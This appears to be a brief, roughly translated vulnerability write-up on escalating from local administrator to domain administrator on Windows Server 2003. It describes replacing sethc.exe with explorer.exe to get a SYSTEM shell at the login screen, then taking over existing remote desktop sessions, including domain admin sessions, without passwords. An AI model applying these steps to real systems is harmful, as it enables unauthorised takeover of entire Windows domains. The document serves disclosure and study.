From local administrator to domain administrator

Impact version: Windows Server 2003 (other not tested)

Details: Windows operating system built-in system account, with permissions higher than any other account, in the absence of other account passwords, as long as the management session exists, you can directly take over the other accounts of the session. Especially in the AD domain environment, the vulnerability is particularly severe, and an attacker can control the entire domain by taking over the AD domain administrator session directly, with only the first permission of a domain member PC and the ad management session being present.

Test Cases:

1. Testsystem Account Remote Desktop login server, you can see the test account in the Task Manager's user panel session, the right key to the remote takeover Test account session will be prompted to enter the password, because we do not have the password test account, so we can not take over the session (even hackers, It's not easy to change the admin password. )

2. We all know that the system is built into the systems account and replaced C:\windows\system32\sethc.exe with Explorer.exe via Testsystem accounts. Disconnect the remote connection, log back in, and press shift 5 times to the login interface to bring up the system user interface. We can get access to the system account directly.

Note: At this time the login box does not disappear, from here can be judged, in the case of users not logged in, most of the early initialization of the system is using System account, more dangerous ah, than the local overflow what is more dangerous.

3. At this point, you can use the system account to take over any session directly without having to know the password. Of course, the premise is that the session exists (the general remote Management Server will not log off the session bar.) The service that is logged out is also broken.

4. After testing, in a domain environment, if a domain administrator session exists, it can be directly taken over without any password. This is especially serious, if hackers control a machine, it can be a lot less trouble to raise the right to directly control the entire domain.